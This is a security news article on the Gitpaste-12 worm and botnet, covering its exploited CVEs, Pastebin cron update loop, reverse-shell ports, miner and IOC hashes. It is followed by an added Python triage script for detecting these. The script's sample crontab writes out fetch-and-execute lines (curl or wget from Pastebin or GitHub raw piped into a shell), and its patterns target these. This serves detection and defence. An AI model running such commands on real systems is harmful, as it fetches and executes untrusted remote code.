Reverse shell botnet Gitpaste-12 spreads via GitHub and Pastebin

by chebbi abir

A newly discovered worm and botnet named Gitpaste-12 lives on GitHub and also uses Pastebin to host malicious code.

The malware comes equipped with reverse shell and cryptomining capabilities and spreads through 12 known attack vectors (11 published vulnerabilities plus Telnet brute-forcing), hence the moniker.

Spreads via GitHub, attacks in 12 different ways

Gitpaste-12 was first detected by Juniper Threat Labs lurking on GitHub around October 15th.

However, the repository's commit history shows the malware had been hosted on GitHub since July 9, 2020; it was taken down on October 30, 2020.

The worm attempts to crack passwords via brute-force and exploits known vulnerabilities on the systems it infects.

Eleven of the attack vectors are the vulnerabilities listed below; the twelfth is a Telnet brute-force component used to spread Gitpaste-12:

CVE-2017-14135: webadmin plugin for OpenDreambox
CVE-2020-24217: HiSilicon-based IPTV/H.264/H.265 video encoders
CVE-2017-5638: Apache Struts
CVE-2020-10987: Tenda router
CVE-2014-8361: miniigd SOAP service in Realtek SDK
CVE-2020-15893: UPnP in D-Link routers
CVE-2013-5948: ASUS routers
EDB-ID 48225: Netlink GPON router
EDB-ID 40500: AVTECH IP camera
CVE-2019-10758: mongo-express (MongoDB web-based admin interface)
CVE-2017-17215: Huawei router

After the initial compromise, Gitpaste-12 downloads a script from a Pastebin URL and sets up a cron job that re-downloads and executes that same script every minute.

This gives the malware a self-updating channel whose Command and Control (C2) source is nothing more than a paste URL:

[Image: Gitpaste-12 initial payload on a Pastebin URL, which has since been removed. Source: Juniper]

Further, the malware downloads the main shell script from GitHub.

The URL where the shell script had lived has since been taken down: https://raw.githubusercontent[.]com/cnmnmsl-001/-/master/shadu1

“The malware begins by preparing the environment. This means stripping the system of its defenses, including firewall rules, selinux, apparmor, as well as common attack prevention and monitoring software,” state Juniper Threat Labs researchers Alex Burt and Trevor Pott.

[Image: Gitpaste-12 main shell script, which begins by attacking a host's defenses such as firewalls. Source: Juniper]

Some of the commands and hostnames in the script indicate that Gitpaste-12 is built to target cloud computing infrastructure run by Alibaba Cloud and Tencent.

Additionally, the botnet is equipped with a Monero (XMR) cryptocurrency miner. 

But there’s more: the worm spreads by picking a random /8 network and attempting to attack every address within it.

“The Gitpaste-12 malware also contains a script that launches attacks against other machines, in an attempt to replicate and spread. It chooses a random /8 CIDR for attack and will try all addresses within that range,” state Juniper’s researchers.

The researchers additionally noted some compromised systems had TCP ports 30004 and 30005 open for receiving commands via reverse shells.

Gitpaste-12 has a low detection rate

Given how recently it was discovered, some files associated with the Gitpaste-12 botnet have a very low detection rate.

At the time of writing, BleepingComputer observed that the payload which helps Gitpaste-12 evade detection was itself not detected by over 93% of the antivirus engines on VirusTotal.

[Image: Gitpaste-12 payload has a very low detection rate. Source: VirusTotal]

Similarly, the crypto miner configuration file and the shell script have not yet been flagged by any antivirus engine listed on VirusTotal, as observed by BleepingComputer:

[Image: Some files have a zero detection rate thus far. Source: VirusTotal]

Juniper’s report on sophisticated malware hosted on GitHub follows the earlier discovery of Octopus Scanner, which had infiltrated over 26 open-source GitHub projects.

And attacks leveraging the open-source ecosystem are only expected to grow, given the ongoing development of such malware.

“There is evidence of test code for possible future modules, indicating ongoing development for this malware. For now, however, targets are Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices,” stated the report released by Juniper Threat Labs. 

Gitpaste-12 Indicators of Compromise (IOCs) are provided below; Juniper’s detailed research can be found in their report.

Miner: e67f78c479857ed8c562e576dcc9a8471c5f1ab4c00bb557b1b9c2d9284b8af9
Miner: ed4868ba445469abfa3cfc6c70e8fdd36a4345c21a3f451c7b65d6041fb8492b
Miner config: bd5e9fd8215f80ca49c142383ba7dbf7e24aaf895ae25af96bdab89c0bdcc3f1
Shell script: 5d1705f02cde12c27b85a0104cd76a39994733a75fa6e1e5b014565ad63e7bc3
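A host triage script that turns the article's indicators into concrete checks, as an added example (this is not code from the article, from BleepingComputer or from Juniper Threat Labs): it flags cron entries that fetch from Pastebin or GitHub raw content and pipe the result into a shell (the every-minute self-update loop described above), listening sockets on TCP 30004 and 30005 (the reverse-shell ports noted above), and files whose SHA-256 matches the IOC list. The crontab and `ss -ltn` lines are constructed samples; the paste ID and repository path in them are hypothetical.

```python
"""Host triage for the Gitpaste-12 indicators described in the article.

Added example, not code from the article or from Juniper Threat Labs.
Checks: a cron entry that re-fetches a script from Pastebin/GitHub raw
content and pipes it to a shell, listeners on TCP 30004/30005, and files
whose SHA-256 matches the published IOC hashes. Sample crontab and
`ss -ltn` lines are constructed for the demo (paste ID and repo path are
hypothetical); the hashes are the article's IOCs.
"""
import hashlib
import re
from typing import Dict, Iterable, List, Optional, Set, Tuple

# IOC SHA-256 hashes as published in the article.
IOC_SHA256: Dict[str, str] = {
    "e67f78c479857ed8c562e576dcc9a8471c5f1ab4c00bb557b1b9c2d9284b8af9": "miner",
    "ed4868ba445469abfa3cfc6c70e8fdd36a4345c21a3f451c7b65d6041fb8492b": "miner",
    "bd5e9fd8215f80ca49c142383ba7dbf7e24aaf895ae25af96bdab89c0bdcc3f1": "miner config",
    "5d1705f02cde12c27b85a0104cd76a39994733a75fa6e1e5b014565ad63e7bc3": "shell script",
}

# TCP ports the article reports open on compromised hosts for reverse shells.
REVERSE_SHELL_PORTS: Set[int] = {30004, 30005}

# Hosts the malware used to stage and update its scripts.
PASTE_HOST_RE = re.compile(
    r"https?://(?:pastebin\.com|raw\.githubusercontent\.com)/\S+", re.IGNORECASE)
# Five schedule fields followed by the command (user crontab format).
CRON_LINE_RE = re.compile(r"^\s*(\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+(.*)$")
# "curl ... | sh" / "wget -qO- ... | bash": remote content executed directly.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba)?sh\b")
# Local "addr:port" followed by the peer "addr:*" column of `ss -ltn`.
SS_LOCAL_PORT_RE = re.compile(r"\S+:(\d+)\s+\S+:\*")


def suspicious_cron_lines(crontab: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (minute field, command) for entries that fetch a script from a
    paste host and pipe it straight into a shell. A '*' minute field is the
    every-minute self-update loop the article describes."""
    hits = []
    for line in crontab:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE_RE.match(line)
        if not m:
            continue
        minute, command = m.groups()
        if PASTE_HOST_RE.search(command) and PIPE_TO_SHELL_RE.search(command):
            hits.append((minute, command))
    return hits


def reverse_shell_listeners(ss_output: Iterable[str]) -> Set[int]:
    """Return the reverse-shell ports found in LISTEN rows of `ss -ltn` output."""
    found = set()
    for line in ss_output:
        if not line.startswith("LISTEN"):
            continue
        m = SS_LOCAL_PORT_RE.search(line)
        if m and int(m.group(1)) in REVERSE_SHELL_PORTS:
            found.add(int(m.group(1)))
    return found


def match_iocs(files: Dict[str, bytes],
               iocs: Optional[Dict[str, str]] = None) -> Dict[str, str]:
    """Hash each file's bytes; map path -> IOC label for every match."""
    table = IOC_SHA256 if iocs is None else iocs
    found = {}
    for path, data in files.items():
        digest = hashlib.sha256(data).hexdigest()
        if digest in table:
            found[path] = table[digest]
    return found


def triage(crontab: Iterable[str], ss_output: Iterable[str],
           files: Dict[str, bytes]) -> dict:
    """Run all three checks and return a report dict."""
    return {
        "cron": suspicious_cron_lines(crontab),
        "ports": reverse_shell_listeners(ss_output),
        "files": match_iocs(files),
    }


# Constructed sample input (paste ID "EXAMPLE" and the repo path are hypothetical).
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "* * * * * curl -fsSL https://pastebin.com/raw/EXAMPLE | sh",
    "*/5 * * * * wget -qO- https://raw.githubusercontent.com/example/repo/master/x | bash",
]
SAMPLE_SS = [
    "State  Recv-Q Send-Q Local Address:Port Peer Address:Port",
    "LISTEN 0      128    0.0.0.0:22        0.0.0.0:*",
    "LISTEN 0      128    0.0.0.0:30004     0.0.0.0:*",
    "LISTEN 0      128    [::]:30005        [::]:*",
]

if __name__ == "__main__":
    print(triage(SAMPLE_CRONTAB, SAMPLE_SS, {"/tmp/clean": b"not malware"}))
```

On a real host, feed `suspicious_cron_lines` the output of `crontab -l` for each user plus the files under /etc/cron.d, and `reverse_shell_listeners` the output of `ss -ltn`; the hash check is only as good as the IOC list, so treat the cron and port checks, which describe the behaviour rather than a specific sample, as the more durable of the three.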
